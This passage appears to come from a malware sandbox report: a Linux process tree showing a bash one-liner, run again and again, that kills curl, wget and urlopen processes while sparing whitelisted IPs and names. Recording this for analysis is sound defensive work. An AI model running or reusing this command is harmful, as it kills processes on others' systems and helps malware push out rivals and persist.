- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2597
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2598
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2599
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2600
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2601
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2602
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2603
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2604
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2605
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2606
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2607
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2608
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2609
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2610
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2611
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2612
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2613
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2614
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2615
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2616
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2617
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2618
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2619
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2620
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2621
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2622
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2623
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2624
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2625
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2626
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2627
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2628
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2629
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2630
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2631
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2632
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2633
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2634
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2635
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2636
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2637
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2638
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2639
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2640
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2641
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2642
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2643
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2644
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2645
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2646
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2647
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2648
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2649
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2650
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2651
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2652
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2653
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2654
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2655
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2656
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2657
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2658
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2659
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2660
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2661
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2662
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2663
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2664
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2665
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2667
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2666
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2668
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2669
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2670
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2671
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2672
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2673
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2674
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2675
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2676
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2677
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2678
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2679
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2680
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2681
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2682
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2683
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2684
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2685
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2686
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2687
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2688
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2689
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2690
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2691
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2692
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2694
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2693
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2695
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2696
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2697
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2698
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2699
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2700
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2701
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2702
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2703
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2704
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2705
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2706
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2707
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2708
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2709
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2710
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2711
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2712
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2713
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2714
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2715
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2716
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2717
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2718
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2719
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2720
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2721
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2722
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2723
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2724
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2725
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2726
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2727
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2728
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2729
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2730
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2731
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2732
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2733
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2734
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2735
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2736
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2737
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2738
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2739
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2740
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2741
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2742
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2743
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2744
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2745
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2746
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2747
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2748
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2749
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2750
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2751
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2752
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2753
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2754
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2755
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2756
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2757
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2758
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2759
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2760
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2761
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2762
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2763
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2764
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2765
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2766
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2767
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2768
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2769
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2770
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2771
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2772
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2773
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2774
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2775
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2776
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2777
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2778
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2779
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2780
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2781
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2782
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2783
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2784
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2785
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2786
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2787
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2788
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2789
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2790
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2791
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2792
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2793
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2794
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2795
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2796
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2797
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2798
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2799
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2800
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2801
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2802
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2803
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2804
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2805
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2806
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2807
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2808
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2809
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2810
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2811
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2812
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2813
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2814
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2815
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2816
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2817
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2818
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2819
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2820
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2822
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2821
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2823
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2824
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2825
- - /usr/bin/ps
    ps aux
    3⤵
    - Process Discovery
    PID:2826
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2827
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2828
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2829
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2830
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2831
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2832
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2833
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2834
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  - Security Software Discovery
  PID:2835
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2836
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2837
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2838
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2839
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2840
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2841
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2842
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2843
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2844
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2845
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2846
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2847
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2848
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2849
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2850
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2851
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2852
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2853
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2854
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2856
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2855
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2857
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2858
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2859
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2860
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2861
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2862
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2863
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2864
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2865
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2866
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2867
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2868
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2869
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2871
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2870
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2872
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2873
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2874
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2875
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2876
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2877
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2878
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2879
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2880
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2881
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2882
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2883
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2885
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2884
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2887
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2886
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2889
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2888
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2890
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2891
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2892
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2893
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2894
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2895
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2896
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2897
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2898
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2899
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2900
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2901
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2902
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2903
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2904
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2905
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2906
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2907
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2908
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2909
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2910
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2911
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2912
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2926
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2927
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2928
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2929
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2930
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2931
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2932
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2933
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2934
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2935
- - /usr/bin/ps
    ps aux
    3⤵
